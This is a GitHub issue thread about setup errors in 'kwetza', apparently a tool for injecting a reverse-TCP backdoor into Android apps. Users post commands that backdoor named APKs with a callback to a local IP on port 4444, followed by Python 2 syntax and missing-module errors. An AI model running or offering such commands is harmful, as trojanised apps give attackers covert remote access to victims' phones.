Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

issue #51

Open
santoshdawre opened this issue Oct 5, 2021 · 1 comment
Open

issue #51

santoshdawre opened this issue Oct 5, 2021 · 1 comment

Comments

@santoshdawre
Copy link

──(root💀kali)-[~/Desktop/kwetza]
└─# python kwetza.py MX.apk TCP 192.168.43.247 4444 yes
File "/root/Desktop/kwetza/kwetza.py", line 17
print "[] BYTING TCP COMMS"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[
] BYTING TCP COMMS")?

@L1u2c3a4s5862
Copy link

I had this error I think is because of bs4, but I have installed bs4: pip install beautifulsoup4.

python kwetza.py com.instabridge.android_14633_apps.evozi.com.apk TCP 172.28.30.187 4444 yes
Traceback (most recent call last):
File "kwetza.py", line 5, in
from bs4 import BeautifulSoup as Soup
ImportError: No module named bs4

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants
@L1u2c3a4s5862 @santoshdawre and others